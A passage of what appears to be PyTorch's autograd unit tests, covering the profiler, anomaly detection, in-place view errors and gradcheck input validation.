traced_foo = torch.jit.trace(foo, x)
def bar(x):
with record_function("in_bar") as rf:
# we expect that profiler will be able
# propagate across fork
fut = torch.jit._fork(traced_foo, x)
y = torch.jit._wait(fut)
# note: continuation (and rf's end) can
# be executed in a different thread
with record_function("in_bar_after_wait") as rf2:
y = y * 2
return y
traced_bar = torch.jit.trace(bar, x)
with profile(use_kineto=kineto_available()) as p:
traced_bar(x)
found_foo = False
found_bar = False
found_bar_after_wait = False
for info in p.function_events:
if info.name == "in_foo":
self.assertFalse(found_foo)
found_foo = True
elif info.name == "in_bar":
self.assertFalse(found_bar)
found_bar = True
elif info.name == "in_bar_after_wait":
self.assertFalse(found_bar_after_wait)
found_bar_after_wait = True
self.assertTrue(found_foo)
self.assertTrue(found_bar)
self.assertTrue(found_bar_after_wait)
def test_record_function_callbacks(self):
x = torch.randn(10, 10)
with profile(use_kineto=kineto_available()) as p:
with record_function("foo"):
y = x * 2 + 4
function_events = p.function_events
foo_event = [event for event in function_events if "foo" in event.name][0]
self.assertEqual(foo_event.count, 1)
def test_profiler_aggregation_fake(self):
events = EventList()
id = [0]
def get_id():
id[0] = id[0] + 1
return id[0]
# [[thread_id, [(start, end, id), ....]], ...]
# Using list instead of a dict so order is guaranteed for any Python
# version
threads = [
[1, [(0, 1, get_id()), (1, 2, get_id())]],
[0, [(0, 2, get_id()), (1, 2, get_id()), (1, 3, get_id())]],
]
for thread, ranges in threads:
for range in ranges:
assert(len(range) == 3)
events.append(
FunctionEvent(
id=range[2],
node_id=0,
name="",
thread=thread,
start_us=range[0],
end_us=range[1],
)
)
events._populate_cpu_children()
# Note that [1, 3] pushes out [0, 2] first. Then we record [1, 2]
# as a child of [1, 3]
res = [[], [], [], [], [4]]
def get_children_ids(event):
return [child.id for child in event.cpu_children]
assert([get_children_ids(event) for event in events] == res)
def test_profiler_aggregation_table(self):
"""
Test if the profiling result is aggregated for `str(prof)`
See: https://github.com/pytorch/pytorch/issues/37500
"""
x = torch.randn(1024)
with torch.autograd.profiler.profile(use_kineto=kineto_available()) as prof:
torch.einsum("i->", x)
prof_str = str(prof)
prof_table = prof.table()
self.assertEqual(prof_table, prof_str)
def test_profiler_function_event_avg(self):
avg = FunctionEventAvg()
avg.add(FunctionEvent(id=0, node_id=0, name="foo", thread=0, start_us=10, end_us=15))
avg.add(FunctionEvent(id=1, node_id=0, name="foo", thread=0, start_us=20, end_us=30))
avg.add(avg)
self.assertEqual(avg.key, "foo")
# aggregate stats
self.assertEqual(avg.count, 4)
self.assertEqual(avg.cpu_time_total, 30)
self.assertEqual(avg.self_cpu_time_total, 30)
self.assertEqual(avg.cuda_time_total, 0)
# average stats
self.assertEqual(avg.cpu_time, 7.5)
self.assertEqual(avg.cuda_time_total, 0)
def test_profiler_shapes(self):
print("")
layer1 = torch.nn.Linear(20, 30)
layer2 = torch.nn.Linear(30, 40)
input = torch.randn(128, 20)
with profile(record_shapes=True, use_kineto=kineto_available()) as prof:
layer2(layer1(input))
print(prof.function_events)
linear_expected_shapes = [
[[128, 20], [30, 20], [30]],
[[128, 30], [40, 30], [40]],
]
found_indices = set()
for event in prof.function_events:
if event.name == "aten::linear":
self.assertTrue(event.input_shapes in linear_expected_shapes)
found_indices.add(linear_expected_shapes.index(event.input_shapes))
self.assertEqual(len(found_indices), len(linear_expected_shapes))
def test_profiler_aggregation_lstm(self):
print("")
rnn = torch.nn.LSTM(10, 20, 2)
total_time_s = 0
with profile(record_shapes=True, use_kineto=kineto_available()) as prof:
for i in range(20):
input = torch.randn(5, 3, 10)
h = torch.randn(2, 3, 20)
c = torch.randn(2, 3, 20)
start = time.time()
rnn(input, (h, c))
end = time.time()
total_time_s += end - start
print(prof.table(
sort_by="self_cpu_time_total", row_limit=10, header="TEST"))
print(prof.key_averages(group_by_input_shape=True).table(
sort_by="self_cpu_time_total", row_limit=10))
print(prof.table(
sort_by="self_cpu_time_total", row_limit=10, max_src_column_width=300, header="TEST", top_level_events_only=True))
print(prof.key_averages(group_by_input_shape=True).table(
sort_by="self_cpu_time_total", row_limit=10, top_level_events_only=True))
total_time_us = total_time_s * 1000.0 * 1000.0 # make it us which is profiler default
print(
"Total time based on python measurements: ",
_format_time(total_time_us)
)
print(
"CPU time measurement python side overhead: {:.2f}%".format(
(total_time_us / prof.self_cpu_time_total - 1.0) * 100.0
)
)
if sys.platform != "win32":
with tempfile.NamedTemporaryFile() as trace_file:
prof.export_chrome_trace(trace_file.name)
def test_record_function(self):
x = torch.randn(10, 10)
def forward(x):
with record_function("outer"):
y = x * 2 + 4
with record_function("inner"):
y = y - 1
y = y / 1
forward(x)
with profile(use_kineto=kineto_available()) as p:
forward(x)
events = p.function_events
important_events = [
'outer',
'aten::mul',
'aten::add',
'inner',
'aten::sub',
'aten::div'
]
idx = 0
for info in events:
if info.name == important_events[idx]:
idx = idx + 1
if idx == len(important_events):
break
self.assertEqual(idx, len(important_events))
# We can also use record_function to decorate arbitrary function
@record_function('my_func')
def f(x, y):
return x + y
with profile(use_kineto=kineto_available()) as p:
f(1, 2)
self.assertTrue('my_func' in str(p))
def test_record_function_multithreaded(self):
rf = record_function("outer")
rf.__enter__()
with record_function("inner"):
# test that exiting the record function after starting another one
# doesn't throw.
rf.__exit__(None, None, None)
with record_function("inner"):
rf.__enter__()
# test that exiting the record function after ending another one
# doesn't throw.
rf.__exit__(None, None, None)
def test_dir(self):
x = torch.randn(10, 10)
keys = dir(x)
self.assertIn('shape', keys)
# real and imag are only implemented for complex tensors.
y = torch.randn(10, 10, dtype=torch.cfloat)
for key in ['real', 'imag']:
self.assertRaises(RuntimeError, lambda: hasattr(x, key))
self.assertTrue(hasattr(y, key))
keys.remove(key)
for key in keys:
self.assertTrue(hasattr(x, key))
def test_as_strided(self):
def test(x, prepro_fn, size, strides, offset=None):
x = x.to(torch.double).detach().requires_grad_()
# Check that forward will **not** resize storage because it may
# cause NaN in output and fail numerical Jacobian check consequently
with torch.no_grad():
y = prepro_fn(x) if prepro_fn is not None else x
max_offset = sum((si - 1) * st for si, st in zip(size, strides))
max_offset += offset if offset is not None else y.storage_offset()
assert max_offset < len(y.storage()), "test case resizes storage"
def closure(x):
if prepro_fn is not None:
x = prepro_fn(x)
return x.as_strided(size, strides, offset)
gradcheck(closure, [x])
gradgradcheck(closure, [x])
# test
test(torch.arange(0, 25), lambda x: x.view(5, 5), [3, 3], [6, 2], 2)
# test crazy stride at dim with size 1 case
test(torch.randn(12), None, [1, 2, 1, 5], [0, 5, 100, 1], 2)
# test expand case
test(torch.randn(5), None, [3, 3, 3], [0, 1, 0], 2)
test(torch.randn(5), None, [3, 3, 3], [0, 0, 0], 4)
test(torch.randn(5), lambda x: x.expand(5, 5), [5, 5], [0, 1], 0)
# test non-expand overlapping case
test(torch.randn(35), None, [6, 6], [5, 1], 2)
test(torch.randn(15), None, [3, 2], [3, 6], 2)
# test transpose case
test(torch.randn(3, 4), None, [4, 3], [1, 4])
# test "getting things outside the input" case
x = torch.randn(6, 2)
test(x[3:], None, [3, 2], [2, 1], 0) # should be all zeros
self.assertEqual(x[3:].as_strided([3, 2], [2, 1], 0), x[:3])
# test select on expanded input case
test(torch.randn(2, 3), lambda x: x.expand(10, 2, 3), [2, 3], [3, 1], 0)
# TODO: see if these tests can be ported to OpInfos or moved to
# test_tensor_creation_ops.py
def _test_lerp_tensor_weights(self, cast):
def construct_inputs(*shapes):
start = cast(torch.randn(shapes[0], dtype=torch.double)).requires_grad_()
end = cast(torch.randn(shapes[1], dtype=torch.double)).requires_grad_()
weight = cast(torch.randn(shapes[2], dtype=torch.double)).requires_grad_()
return [start, end, weight]
all_test_shapes = [((3, 3, 3), (3, 3, 3), (3, 3, 3)), # no broadcasting
((3,), (3, 3, 3), (3, 3, 3)), # start broadcasting - 1
((3, 3, 3), (3,), (3, 3, 3)), # end broadcasting - 1
((3, 3, 3), (3, 3, 3), (3,)), # weight broadcasting - 1
((), (3, 3, 3), (3, 3, 3)), # start broadcasting - 2
((3, 3, 3), (), (3, 3, 3)), # end broadcasting - 2
((3, 3, 3), (3, 3, 3), ()), # weight broadcasting - 2
((3, 3), (3, 3, 3), (3,))] # all broadcasting
for shapes in all_test_shapes:
cur_inputs = construct_inputs(*shapes)
gradcheck(torch.lerp, cur_inputs)
gradgradcheck(torch.lerp, cur_inputs)
def test_lerp_tensor_weights(self):
self._test_lerp_tensor_weights(lambda t: t)
# TODO: see if these tests can be moved to OpInfos or test_reductions.py
def test_reduce_dtype(self):
def test_reduction(op, has_no_dim, takes_dtype=True):
x = torch.randn(3, 3, dtype=torch.float, requires_grad=True)
if has_no_dim:
grad1, = torch.autograd.grad([op(x)], [x])
grad2, = torch.autograd.grad([op(x, dtype=torch.double)], [x])
self.assertEqual(grad1, grad2)
self.assertEqual(grad2.dtype, torch.float)
gi = torch.randn(op(x, dim=0).shape, dtype=torch.float)
grad1, = torch.autograd.grad([op(x, dim=0)], [x], gi)
if takes_dtype:
grad2, = torch.autograd.grad([op(x, dim=0, dtype=torch.double)], [x], gi.double())
else:
grad2, = torch.autograd.grad([op(x.double(), dim=0)], [x], gi.double())
self.assertEqual(grad1, grad2)
self.assertEqual(grad2.dtype, torch.float)
test_reduction(torch.sum, True)
test_reduction(torch.prod, True)
test_reduction(torch.cumsum, False)
test_reduction(torch.cumprod, False)
test_reduction(torch.logcumsumexp, False, takes_dtype=False)
def test_inplace_on_view_saved_output(self):
# Test an in-place operation on a view in which the in-place op saves
# its output. Previously, this created a reference cycle.
dealloc = [0]
class IncrementOnDelete(object):
def __del__(self):
dealloc[0] += 1
def test():
root = torch.randn(3, 3, requires_grad=True)
copy = root.clone()
copy.grad_fn.register_hook(IncrementOnDelete())
view = copy.view(9)
torch.nn.functional.relu(view, inplace=True)
test()
self.assertEqual(dealloc[0], 1)
def test_inplace_on_view_leaf_errors(self):
# Issue #21875: Fail faster (when we try to modify the view vs. in backward())
x = torch.zeros(1, requires_grad=True)
y = x.view_as(x)
with self.assertRaisesRegex(RuntimeError,
"a view of a leaf Variable that "
"requires grad is being used in "
"an in-place operation."):
y.add_(1)
def test_inplace_on_view_backward(self):
# Issue #10532: Make sure that this does not raise RuntimeError.
net = nn.Sequential(
nn.InstanceNorm2d(2),
nn.ReLU(True)
)
x = torch.tensor([[[[1.0, 1.0]]]], requires_grad=True)
g, = torch.autograd.grad(net(x).pow(2), [x], grad_outputs=x.new_ones(x.shape) , create_graph=True)
torch.autograd.grad(g.sum(), [x])
self.assertEqual(x, torch.tensor([[[[1.0, 1.0]]]]))
# https://discuss.pytorch.org/t/freeing-buffer-strange-behavior/31955/8
inputs = torch.ones((1, 3, 256, 256), requires_grad=True)
tmp1 = (inputs + 1).view_as(inputs)
tmp2 = torch.nn.functional.threshold(tmp1, 0., 0., True)
prob_interpolated = torch.sigmoid(tmp2)
gradients = torch.autograd.grad(outputs=prob_interpolated, inputs=inputs,
grad_outputs=torch.ones(prob_interpolated.size()),
create_graph=True, retain_graph=True)[0]
gradient_penalty = gradients.sum()
gradient_penalty.backward()
fn = gradient_penalty.grad_fn.next_functions[0][0].next_functions[1][0]
self.assertEqual(fn.name(), "ThresholdBackwardBackward")
def test_inplace_on_view_weak_grad_fn(self):
# Issue 23502: Test that b's grad_fn is preserved.
a = torch.arange(10.0, requires_grad=True)
b = a.narrow(0, 0, 2).clone().view(-1)
b.relu_()
c = b.clone()
del b
gc.collect()
s = c.sum()
s.backward()
self.assertEqual(s, torch.tensor(1.0))
# Issue #21875: Fail faster (when we try to modify the view vs. in backward())
a = torch.rand(10, requires_grad=True).narrow(0, 0, 10)
with self.assertRaises(RuntimeError):
b = a.relu_()
# TODO: see if these tests can be moved to OpInfo or test_binary_ufuncs.py
def test_mul_out(self):
a = torch.randn(2, 2, requires_grad=True)
b = torch.randn(2, 2, requires_grad=True)
x = torch.zeros_like(a)
# out=... functions don't support automatic differentiation currently
self.assertRaisesRegex(RuntimeError, 'out=', lambda: torch.mul(a, b, out=x))
# the inputs can require grad if we're in no_grad() mode
with torch.no_grad():
torch.mul(a, b, out=x)
self.assertEqual(x, a * b)
def test_mul_out_result_requires_grad(self):
a = torch.randn(2, 2)
b = torch.randn(2, 2)
x = torch.zeros(2, 2, requires_grad=True)
# we should throw an exception if the output requires grad
self.assertRaisesRegex(RuntimeError, 'out=', lambda: torch.mul(a, b, out=x))
# TODO: see if this test can be OpInfo'd or moved to diagonal's test suite
def test_diagonal_derivative_requires_grad(self):
# test that the backward requires grad
# we do this is because diagonal_backward uses inplace
# operations and gradgradcheck does not catch whether
# they works as expected (it will succeed even if
# the gradient has requires_grad == False
a = torch.randn(5, 6, requires_grad=True)
b = torch.diagonal(a)**2
c = b.sum()
d, = torch.autograd.grad(c, a, retain_graph=True, create_graph=True)
self.assertTrue(d.requires_grad)
def test_anomaly_detect_nan(self):
size = 10
class MyFunc(Function):
@staticmethod
def forward(ctx, inp1, inp2, fail_0th):
ctx.fail_0th = fail_0th
return inp1.sum(0, keepdim=True)
@staticmethod
def backward(ctx, gO):
gI = gO.clone().expand(size)
gI[0] = 0
gI[0] /= 0 # Generate a nan
if ctx.fail_0th:
return gI, None, None
else:
return None, gI, None
inp = torch.rand(size, requires_grad=True)
out = MyFunc.apply(inp, inp, True)
out.backward() # Should not fail
inp = torch.rand(size, requires_grad=True)
out = MyFunc.apply(inp, inp, True)
with self.assertRaisesRegex(RuntimeError, "Function 'MyFuncBackward' returned nan values in its 0th output."):
with warnings.catch_warnings(record=True) as w:
with detect_anomaly():
out.backward()
self.assertIn('No forward pass information', str(w[0].message))
inp = torch.rand(size, requires_grad=True)
with self.assertRaisesRegex(RuntimeError, "Function 'MyFuncBackward' returned nan values in its 1th output."):
with warnings.catch_warnings(record=True) as w:
with detect_anomaly():
out = MyFunc.apply(inp, inp, False)
out.backward()
self.assertIn('MyFunc.apply', str(w[0].message))
def test_nested_anomaly_detect_nan(self):
size = 10
class MyFunc(Function):
@staticmethod
def forward(ctx, inp1, fail_0th):
ctx.fail_0th = fail_0th
ctx.save_for_backward(inp1)
return inp1.sum(0, keepdim=True)
@staticmethod
def backward(ctx, gO):
inp, = ctx.saved_tensors
fail_0th = ctx.fail_0th
g = gO.clone().expand(size)
gI = MyFunc2.apply(g * inp, g + inp, fail_0th)
return gI, None
class MyFunc2(Function):
@staticmethod
def forward(ctx, inp1, inp2, fail_0th):
ctx.fail_0th = fail_0th
return inp1 * 2.0 + inp2
@staticmethod
def backward(ctx, gO):
fail_0th = ctx.fail_0th
g1 = gO.clone()
g2 = gO.clone()
g1[0] = 0
g2[0] = 0
# generate a nan
if fail_0th:
g1[0] /= 0
else:
g2[0] /= 0
return g1, g2, None
inp = torch.rand(size, requires_grad=True)
out = MyFunc.apply(inp, True)
ginp, = torch.autograd.grad(out, (inp,), create_graph=True)
gsum = ginp.sum()
gsum.backward() # should not fail
inp = torch.rand(size, requires_grad=True)
out = MyFunc.apply(inp, True)
ginp, = torch.autograd.grad(out, (inp,), create_graph=True)
gsum = ginp.sum()
with warnings.catch_warnings(record=True) as w:
with self.assertRaisesRegex(RuntimeError, "Function 'MyFunc2Backward' returned nan values in its 0th output."):
with detect_anomaly():
gsum.backward()
self.assertIn('No forward pass information', str(w[1].message))
inp = torch.rand(size, requires_grad=True)
with warnings.catch_warnings(record=True) as w:
with self.assertRaisesRegex(RuntimeError, "Function 'MyFunc2Backward' returned nan values in its 1th output."):
with detect_anomaly():
out = MyFunc.apply(inp, False)
ginp, = torch.autograd.grad(out, (inp,), create_graph=True)
gsum = ginp.sum()
gsum.backward()
self.assertIn('MyFunc2.apply', str(w[1].message))
self.assertIn('MyFunc.apply', str(w[2].message))
def test_anomaly_grad_warnings(self):
# PyTorch won't throw warnings if there is an error
# but we'd want to at least see them in stderr
class StdErrDiverter:
def __enter__(self):
self.stderr_orig = sys.stderr
self.stderr_new = io.StringIO()
sys.stderr = self.stderr_new
return self
def __exit__(self, *args):
self.captured = self.stderr_new.getvalue()
sys.stderr = self.stderr_orig
# if the warnings don't throw, they will be handled as regular warnings
with self.assertRaisesRegex(RuntimeError,
"one of the variables needed for gradient computation has been "
"modified by an inplace operation"):
with warnings.catch_warnings(record=True) as w:
with detect_anomaly():
a = torch.randn(5, requires_grad=True)
d1 = a + 1
d2 = d1 ** 2
d1 += 1
torch.autograd.grad(d2.sum(), a)
self.assertEqual(len(w), 2)
self.assertIn('Anomaly Detection has been enabled', str(w[0].message))
self.assertIn('Error detected in PowBackward0', str(w[1].message))
# if the warning throws, it will be printed to sys.stderr
with self.assertRaisesRegex(RuntimeError,
"one of the variables needed for gradient computation has been "
"modified by an inplace operation"):
with warnings.catch_warnings(record=True) as w:
with detect_anomaly():
warnings.simplefilter("error")
with StdErrDiverter() as s:
a = torch.randn(5, requires_grad=True)
d1 = a + 1
d2 = d1 ** 2
d1 += 1
torch.autograd.grad(d2.sum(), a)
self.assertEqual(len(w), 1)
self.assertIn('Anomaly Detection has been enabled', str(w[0].message))
self.assertIn('Error detected in PowBackward0', s.captured)
def test_anomaly_assign_parent_cleanup(self):
# Test that python objects created are properly cleaned up when assign_parent is called
import weakref
def get_ref():
# we use torch.exp here but any function that will construct a new node in its
# backward call in grad mode will work
x = torch.randn(2, 2, requires_grad=True)
t = x.exp()
# ExpBackward calls mul, creating the MulBackward node when create_graph=True.
# In anomaly mode, a PyObject referencing MulBackward's "parent" ExpBackward is added to
# MulBackward's anomaly metadata dict, creating the following reference chain:
#
# grad -> MulBackward -> PyObject -> ExpBackward
#
with detect_anomaly():
grad = torch.autograd.grad(t, x, torch.ones_like(t), create_graph=True)
# We add a weak reference to a new Foo object, which we insert into ExpBackward's metadata dict
#
# (PyObject) -> ExpBackward -> dict -> *Foo*
# t ----^ WeakRef ---^
#
# We want to test that when grad goes out of scope at the end of this function that PyObject is destroyed
# We can test this by seeing whether Foo is not kept alive once t is destroyed
class Foo(object):
pass
my_obj = Foo()
meta_dict = t.grad_fn.metadata
meta_dict[0] = my_obj
ref = weakref.ref(my_obj)
return t, ref
t, ref = get_ref()
self.assertIsNotNone(ref())
del t
self.assertIsNone(ref())
def test_nested_anomaly_printstack_cleanup(self):
# Test if metadata dict PyObject is properly destroyed
import weakref
def get_ref():
# This is similar to the construction in test_anomaly_assign_parent_cleanup:
#
# MyFuncBackward2 -> PyObject -> MyFuncBackward -> dict -> Foo
# out ---^ WeakRef ---^
#
# We want to check that Foo is still properly destroyed even when MyFunc2Backward's
# AnomalyMetadata calls printstack, which does some python object manipulation.
#
# You might be wondering why we still have to test_anomaly_assign_parent_cleanup,
# since if PyObject is not destroyed here, wouldn't this test would detect that also?
# The answer is that custom function's PyObject (THPFunction) actually only hold
# a weak reference to the c++ node!
class MyFunc(Function):
@staticmethod
def forward(ctx, x):
ctx.save_for_backward(x)
return x
@staticmethod
def backward(ctx, gO):
x, = ctx.saved_tensors
return MyFunc2.apply(x)
class MyFunc2(Function):
@staticmethod
def forward(ctx, x):
return x
@staticmethod
def backward(ctx, gO):
return gO + float("NaN")
inp = torch.rand(1, requires_grad=True)
out = MyFunc.apply(inp)
ginp, = torch.autograd.grad(out, (inp,), create_graph=True)
with warnings.catch_warnings(record=True) as w:
with self.assertRaisesRegex(RuntimeError, "Function 'MyFunc2Backward' returned nan values in its 0th output."):
with detect_anomaly():
ginp.backward()
class Foo(object):
pass
my_obj = Foo()
meta_dict = out.grad_fn.metadata
meta_dict[0] = my_obj
ref = weakref.ref(my_obj)
return out, ref
t, ref = get_ref()
self.assertIsNotNone(ref())
del t
self.assertIsNone(ref())
# TODO: update these tests to use the linalg module and move to test_linalg.py
@skipIfNoLapack
def test_eig_no_eigenvectors(self):
A = torch.tensor([[1., 2.], [2., 4.]], dtype=torch.float32, requires_grad=True)
w, v = torch.eig(A, eigenvectors=False)
with self.assertRaisesRegex(RuntimeError, 'is not differentiable'):
torch.autograd.backward([w, v], [torch.ones_like(w), torch.ones_like(v)])
@skipIfNoLapack
def test_eig_complex_eigenvalues(self):
A = torch.tensor([[0., -1.], [1., 0.]], dtype=torch.float32, requires_grad=True)
w, v = torch.eig(A, eigenvectors=True)
with self.assertRaisesRegex(RuntimeError, 'does not support complex eigenvalues'):
torch.autograd.backward([w, v], [torch.ones_like(w), torch.ones_like(v)])
@skipIfNoLapack
def test_symeig_no_eigenvectors(self):
A = torch.tensor([[1., 2.], [2., 4.]], dtype=torch.float32, requires_grad=True)
w, v = torch.symeig(A, eigenvectors=False)
with self.assertRaisesRegex(RuntimeError, 'is not differentiable'):
torch.autograd.backward([w, v], [torch.ones_like(w), torch.ones_like(v)])
@skipIfNoLapack
def test_svd_no_singularvectors(self):
A = torch.randn(2, 2, dtype=torch.float32, requires_grad=True)
u, s, v = torch.svd(A, compute_uv=False)
with self.assertRaisesRegex(RuntimeError, 'cannot compute backward'):
torch.autograd.backward([u, s, v], [torch.ones_like(u), torch.ones_like(s), torch.ones_like(v)])
def test_no_grad_copy(self):
# create autograd function that saves grad pointer as class static
class MyFunc(Function):
static_grad_ptr = None
@staticmethod
def forward(ctx, inp1, inp2):
return inp1 + inp2
@staticmethod
def backward(ctx, grad):
MyFunc.static_grad_ptr = grad.data_ptr()
return grad, grad
class NonContGradFunc(Function):
@staticmethod
def forward(ctx, inp1):
ctx.size = inp1.size()
return torch.tensor([1.])
@staticmethod
def backward(ctx, grad):
return torch.ones(1).expand(ctx.size)
a = torch.randn(5, 6, requires_grad=True)
b = torch.randn(5, 6, requires_grad=True)
# non-contiguous grad should be copied
NonContGradFunc.apply(MyFunc.apply(a, b)).backward()
self.assertFalse(a.grad.data_ptr() == MyFunc.static_grad_ptr)
self.assertFalse(b.grad.data_ptr() == MyFunc.static_grad_ptr)
# test case that should trigger no copy for one of a,b
a.grad = b.grad = None
MyFunc.apply(a, b)[1][0].backward()
p_g = MyFunc.static_grad_ptr
p_a = a.grad.data_ptr()
p_b = b.grad.data_ptr()
# check a,b uses different grad buffer
self.assertFalse(p_a == p_b)
# check one of them is using the computed buffer
self.assertTrue(p_a == p_g or p_b == p_g)
def test_no_grad_copy_sparse(self):
# create autograd function that saves grad pointer as class static
class MyFunc(Function):
static_grad_ptr = None
@staticmethod
def forward(ctx, inp1, inp2):
return inp1 + inp2
@staticmethod
def backward(ctx, grad):
MyFunc.static_grad_ptr = grad._values().data_ptr()
return grad, grad
class NonContGradFunc(Function):
static_grad_ptr = None
@staticmethod
def forward(ctx, inp1, inp2):
return inp1 + inp2
@staticmethod
def backward(ctx, grad):
# Create a sparse tensor with non-contigous indices and values
# and return as grad.
v = torch.rand(1, 3)
i = torch.ones(1, 1, dtype=torch.long)
nv = v.expand(8, 3)
ni = i.expand(1, 8)
ngrad = torch.sparse.FloatTensor(ni, nv, torch.Size([10, 3]))
NonContGradFunc.static_grad_ptr = ngrad._values().data_ptr()
return ngrad, ngrad
a = torch.randn(10, 3, requires_grad=True)
b = torch.randn(10, 3, requires_grad=True)
input = torch.tensor([1, 2, 4, 5, 4, 3, 2, 9])
offsets = torch.tensor([0, 4])
import torch.nn.functional as F
# test case that should trigger no copy for one of a,b
emb_matrix = MyFunc.apply(a, b)
loss = F.embedding_bag(emb_matrix, input, offsets, sparse=True).sum()
loss.backward(retain_graph=True)
p_g = MyFunc.static_grad_ptr
p_a = a.grad._values().data_ptr()
p_b = b.grad._values().data_ptr()
# check a,b uses different grad buffer
self.assertFalse(p_a == p_b)
# check one of them is using the computed buffer
self.assertTrue(p_a == p_g or p_b == p_g)
# Run backwards multiple times to ensure accumulation works.
for i in range(10):
loss.backward(retain_graph=True)
# non-contiguous indices and value, we should trigger a copy.
a.grad = b.grad = None
emb_matrix = NonContGradFunc.apply(a, b)
loss = F.embedding_bag(emb_matrix, input, offsets, sparse=True).sum()
loss.backward(retain_graph=True)
p_g = NonContGradFunc.static_grad_ptr
p_a = a.grad._values().data_ptr()
p_b = b.grad._values().data_ptr()
# check a,b uses different grad buffer
self.assertFalse(p_a == p_b)
# Verify we cloned both grads.
self.assertFalse(p_a == p_g)
self.assertFalse(p_b == p_g)
# Run backwards multiple times to ensure accumulation works.
for i in range(10):
loss.backward(retain_graph=True)
def test_gradcheck_single_input(self):
def check(fast_mode):
def f(inp):
return inp.mul(5)
gradcheck(f, torch.rand(10, dtype=torch.float64, requires_grad=True), fast_mode=fast_mode)
gradgradcheck(f, torch.rand(10, dtype=torch.float64, requires_grad=True), fast_mode=fast_mode)
check(fast_mode=True)
check(fast_mode=False)
def test_gradcheck_sparse_input(self):
def check(fast_mode):
def fn(sparse):
return torch.sparse.sum(sparse)
gradcheck(fn, torch.rand(10, dtype=torch.double).to_sparse().requires_grad_(True), check_sparse_nnz=True,
check_batched_grad=False, fast_mode=fast_mode)
with self.assertRaisesRegex(RuntimeError, 'gradcheck expects all tensor inputs are dense'):
gradcheck(fn, torch.rand(10, dtype=torch.double).to_sparse().requires_grad_(True), check_sparse_nnz=False,
check_batched_grad=False, fast_mode=fast_mode)
check(fast_mode=True)
check(fast_mode=False)
def test_gradcheck_nondeterministic(self):
class NonDetFunc(Function):
@staticmethod
def forward(ctx, x, jitter=0.0):
ctx._jitter = jitter
return x
@staticmethod
def backward(ctx, grad_out):
return NonDetFunc.apply(grad_out, ctx._jitter) * (1 + torch.rand_like(grad_out) * ctx._jitter), None
def check(fast_mode):
inp = torch.randn(5, 5, dtype=torch.double, requires_grad=True)
gradcheck(lambda x: NonDetFunc.apply(x, 0.0), inp, check_batched_grad=False, fast_mode=fast_mode)
with self.assertRaisesRegex(RuntimeError, 'Backward is not reentrant'):
gradcheck(lambda x: NonDetFunc.apply(x, 1e-6), inp, check_batched_grad=False, fast_mode=fast_mode)
with self.assertRaisesRegex(RuntimeError, 'Backward is not reentrant'):
gradgradcheck(lambda x: NonDetFunc.apply(x, 1e-12), inp, check_batched_grad=False, fast_mode=fast_mode)
gradcheck(lambda x: NonDetFunc.apply(x, 0.0), inp, nondet_tol=1e-5, check_batched_grad=False,
fast_mode=fast_mode)
gradcheck(lambda x: NonDetFunc.apply(x, 1e-6), inp, nondet_tol=1e-5, check_batched_grad=False,
fast_mode=fast_mode)
gradgradcheck(lambda x: NonDetFunc.apply(x, 1e-12), inp, nondet_tol=1e-5, check_batched_grad=False,
fast_mode=fast_mode)
check(fast_mode=True)
check(fast_mode=False)
def test_gradcheck_validates_inputs(self):
def check(fast_mode):
# when inputs are not dense, but check_sparse_nnz is false
x = torch.rand(10, requires_grad=True).to_sparse()
with self.assertRaisesRegex(RuntimeError, 'dense when check_sparse_nnz is set to False.'):
gradcheck(lambda x: x.to_dense(), (x,), check_sparse_nnz=False, check_batched_grad=False,
fast_mode=fast_mode)
self.assertFalse(gradcheck(lambda x: x.to_dense(), (x,), check_sparse_nnz=False,
check_batched_grad=False, raise_exception=False, fast_mode=fast_mode))
# when none of the inputs require grad (always raises even if raise_exception=False)
x = torch.rand(10, requires_grad=False)
with self.assertRaisesRegex(ValueError, 'at least one input tensor to require gradient'):
gradcheck(lambda x: x, (x,), raise_exception=False, fast_mode=fast_mode)
# (warning) when inputs are not double precision
x = torch.ones(1, dtype=torch.float32, requires_grad=True)
with self.assertWarnsRegex(UserWarning, "Input #0 requires gradient and is not a double precision"):
self.assertTrue(gradcheck(lambda x: x, (x,), atol=1e-1, fast_mode=fast_mode))
# when layout is not mkldnn(aka has strides) and input has a dimension with stride 0. (always raises
# even if raise_exception=False)
x = torch.ones(1, dtype=torch.float64, requires_grad=True)
x = x.expand((2, 2))
with self.assertRaisesRegex(RuntimeError, 'The 0th input has a dimension with stride 0'):
gradcheck(lambda x: x, (x,), raise_exception=False, fast_mode=fast_mode)
check(fast_mode=True)
check(fast_mode=False)
@unittest.skipIf(not torch._C.has_mkldnn, "MKL-DNN build is disabled")
def test_gradcheck_validates_input_mkldnn(self):
# when mkldnn inputs, forward mode testing is not allowed
# Update tolerances below to make sure the gradient match even in single precision floats
# Use the warning assert to hide the float32 warning
x = torch.ones(1).to_mkldnn().requires_grad_()
with self.assertWarnsRegex(UserWarning, "Input #0 requires gradient and is not a double precision"):
with self.assertRaisesRegex(ValueError, 'MKLDNN inputs are not support for forward AD gradcheck.'):
gradcheck(lambda x: x.to_dense(), (x,), raise_exception=False, fast_mode=False, check_forward_ad=True,
atol=1e-1, rtol=1e-1)
with self.assertWarnsRegex(UserWarning, "Input #0 requires gradient and is not a double precision"):
with self.assertRaisesRegex(ValueError, 'MKLDNN inputs are not support for forward AD gradcheck.'):
gradcheck(lambda x: x.to_dense(), (x,), raise_exception=False, fast_mode=True, check_forward_ad=True,
atol=1e-1, rtol=1e-1)
@unittest.skipIf(not torch._C.has_mkldnn, "MKL-DNN build is disabled")
def test_gradcheck_test_outputs(self):
def check(fast_mode):
# when sparse outputs (always raise even if raise_exception=False)
x = torch.rand(10, requires_grad=True).to_sparse()
with self.assertRaisesRegex(ValueError, 'Sparse output is not supported at gradcheck yet'):
gradcheck(lambda x: x, (x,), check_sparse_nnz=True, check_batched_grad=False, raise_exception=False,
fast_mode=fast_mode)
# when mkldnn outputs (always raise even if raise_exception=False)
root = torch.randn(4, 5, dtype=torch.float32, requires_grad=True)
with self.assertRaisesRegex(ValueError, 'MKLDNN output is not supported at gradcheck yet'):
gradcheck(lambda x: x.to_mkldnn(), (root,), check_batched_grad=False, raise_exception=False, fast_mode=fast_mode)
check(fast_mode=True)
check(fast_mode=False)
def test_gradcheck_check_no_differentiable_outputs(self):
def check(fast_mode):
# When none of the outputs are differentiable, but numerical gradient is not zero
x = torch.ones((1,), requires_grad=True)
with self.assertRaisesRegex(RuntimeError, 'Numerical gradient for function expected to be zero'):
gradcheck(lambda x: torch.tensor([x]), x)
self.assertFalse(gradcheck(lambda x: torch.tensor([x]), x, raise_exception=False, fast_mode=fast_mode))
# succeed when no outputs at all
